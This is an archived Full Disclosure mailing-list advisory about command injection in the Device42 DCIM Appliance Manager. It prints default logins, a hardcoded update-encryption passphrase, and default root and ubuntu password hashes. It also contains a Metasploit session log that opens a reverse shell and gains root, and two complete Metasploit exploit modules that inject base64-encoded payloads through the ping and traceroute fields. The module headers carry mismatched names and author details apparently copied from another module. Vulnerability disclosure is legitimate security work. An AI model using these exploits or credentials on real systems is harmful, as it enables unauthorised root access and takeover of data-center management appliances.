[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] device42 DCIM authenticated remote root via appliance manager
From: Brandon Perry <bperry.volatile () gmail ! com>
Date: 2014-11-25 18:47:26
Message-ID: CAOJKFBCDtxjQXUaXKbfG3jTsX5v9v5bgu3Xus-LTy-7YjPqecQ () mail ! gmail ! com
[Download RAW message or body]
Remote Authenticated Root in Device42 DCIM Appliance Manager v5.10 and v6.0
http://www.device42.com/download/
Device42 ships virtual appliances ready for production use as a trial
(essentially dictated by the license provided).
The Appliance Manager listens on HTTP (no SSL) on port 4242 with default
credentials of d42admin:default.
Within the Appliance Manager, the Ping and Traceroute utilities are
susceptible to command injection via bash metacharacters. The user which
the commands get executed under is the 'ubuntu' user, but this user has
passwordless sudo ability, so it is essentially root access. Two exploits
are provided that exploit these vulnerabilities using the default
credentials.
Updates from device42 are encrypted by default to prevent users from
creating their own updates and uploading them, but the password for the
encrypted zip file is 'pass:zofo8REgqM' so any user could create their own
encrypted update using this passphrase.
openssl enc -aes-256-cbc -d -in /tmp/update.enc -out /tmp/update.zip -pass
pass:zofo8REgqM
Also, the root and ubuntu users have default passwords in the shadow file.
Root –
$6$zhdissWh$2VrhU3tncXClbuUU3dJk2ieAKF3kTPpvcT9/VKw.Yw4rl1E2eYpAYAfZUgSZvYhqVQvUqLVRp8HOsoMueKgd10
Ubuntu –
$6$1eU5n9o7$w4.tmNriNT1Zb5HabWwlGmnmy8ij1fKbn0UGf9raHKdIaurYVD/ZU9C2s6DBueKhVbekZCozzAoHZH43.OwDi/
msf exploit(device42_tracert_exec) > show options
Module options (exploit/linux/http/device42_tracert_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no Use a proxy chain
RHOST 192.168.1.81 yes The target address
RPORT 4242 yes The target port
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.31 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(device42_tracert_exec) > exploit
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo YWFxSIuVtNUMShSi;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "YWFxSIuVtNUMShSi\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 3 opened (192.168.1.31:4444 -> 192.168.1.81:39878)
at 2014-11-22 17:36:59 -0600
sudo su
id
uid=0(root) gid=0(root) groups=0(root)
exit
id
uid=1000(ubuntu) gid=1000(ubuntu)
groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),114(sambashare)
--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
["device42_ping_exec.rb" (text/x-ruby-script)]
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'WAN Emulator v2.3 Command Execution',
'Description' => %q{
},
'License' => MSF_LICENSE,
'Privileged' => true,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Author' =>
[
'Brendan Coles <bcoles[at]gmail.com>', # Discovery and exploit
],
'References' =>
[
],
'Payload' =>
{
'Space' => 1024,
'BadChars' => "",
'DisableNops' => true,
#'Compat' =>
# {
# 'PayloadType' => 'cmd',
# 'RequiredCmd' => 'generic netcat netcat-e',
# }
},
'DefaultOptions' =>
{
'ExitFunction' => 'none'
},
'Targets' =>
[
['Automatic Targeting', { 'auto' => true }]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 12 2012'
))
end
def exploit
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'accounts', 'login/'),
})
cookie = res.headers['Set-Cookie']
csrf = $1 if res.body =~ / name='csrfmiddlewaretoken' value='(.*)' \/><\/div>/
post = {
'csrfmiddlewaretoken' => csrf,
'username' => 'd42admin',
'password' => 'default',
'next' => '/'
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'accounts', 'login/'),
'vars_post' => post,
'method' => 'POST',
'cookie' => cookie
})
unless res.code == 302
fail_with("auth failed")
end
cookie = res.headers['Set-Cookie']
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ping/'),
'cookie' => cookie
})
cookie = res.headers['Set-Cookie']
csrf = $1 if res.body =~ / name='csrfmiddlewaretoken' value='(.*)' \/><\/div>/
post = {
'csrfmiddlewaretoken' => csrf,
'pingip' => "www.google.com`echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode|sh`",
'ping' => ''
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ping/'),
'method' => "POST",
'vars_post' => post,
'cookie' => cookie
})
end
end
["device42_tracert_exec.rb" (text/x-ruby-script)]
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'WAN Emulator v2.3 Command Execution',
'Description' => %q{
},
'License' => MSF_LICENSE,
'Privileged' => true,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Author' =>
[
'Brendan Coles <bcoles[at]gmail.com>', # Discovery and exploit
],
'References' =>
[
],
'Payload' =>
{
'Space' => 1024,
'BadChars' => "",
'DisableNops' => true,
#'Compat' =>
# {
# 'PayloadType' => 'cmd',
# 'RequiredCmd' => 'generic netcat netcat-e',
# }
},
'DefaultOptions' =>
{
'ExitFunction' => 'none'
},
'Targets' =>
[
['Automatic Targeting', { 'auto' => true }]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 12 2012'
))
end
def exploit
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'accounts', 'login/'),
})
cookie = res.headers['Set-Cookie']
csrf = $1 if res.body =~ / name='csrfmiddlewaretoken' value='(.*)' \/><\/div>/
post = {
'csrfmiddlewaretoken' => csrf,
'username' => 'd42admin',
'password' => 'default',
'next' => '/'
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'accounts', 'login/'),
'vars_post' => post,
'method' => 'POST',
'cookie' => cookie
})
unless res.code == 302
fail_with("auth failed")
end
cookie = res.headers['Set-Cookie']
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ping/'),
'cookie' => cookie
})
cookie = res.headers['Set-Cookie']
csrf = $1 if res.body =~ / name='csrfmiddlewaretoken' value='(.*)' \/><\/div>/
post = {
'csrfmiddlewaretoken' => csrf,
'traceip' => "www.google.com`echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode|sh`",
'trace' => ''
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ping/'),
'method' => "POST",
'vars_post' => post,
'cookie' => cookie
})
end
end
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic